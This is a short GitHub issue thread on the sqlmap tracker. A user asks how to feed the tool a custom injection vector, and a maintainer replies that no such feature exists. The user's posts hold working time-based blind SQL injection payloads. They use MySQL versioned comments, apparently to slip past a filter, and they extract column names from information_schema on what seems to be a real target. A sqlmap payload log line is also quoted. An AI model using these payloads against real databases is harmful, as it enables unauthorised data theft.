### ISSUE TITLE
Custom inject vector

### ISSUE THREAD

**Issue by JonhSilver** [sqlmapproject/sqlmap#2390]
How to point to sqlmap to injection vector like

> ' and /*!30000if(%True_Expression%,BENCHMARK(47866164.5,MD5(0x41)),0)*/ and 'x'='x

as sqlmap cant find it automatically, but in manual case injection working with this vector.

**Comment by stamparm** [comment]
There is no such feature as it is impossible to do it. Your payload is most probably a custom one bypassing some XYZ protection, while it is not "telling" anything how to perform queries inside. sqlmap can't guess this.

In this kind of cases please make your own custom scripts per target/case

**Comment by JonhSilver** [comment]
Custom working vector is 

Iuy1' and /*!30000if(ascii(substring((select distinct column_name from `information_schema`.columns where table_schema=0x62623434 and table_name=0x7573657273 limit 22,1),21,1))<116,BENCHMARK(8311139.1,MD5(0x41)),0)*/ and 'x'='x

Sqmap not working (cant detect information_schema, only detect current database name and do not detect enymore else) detected vector is

[11:48:16] [PAYLOAD] g' AND 7889=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHA
R),0x20) FROM bd1.users),1,1))>806985),SLEEP(10),7889)-- mIyv


And why always using COUNT(*) ? how to start dump without COUNT(*)?
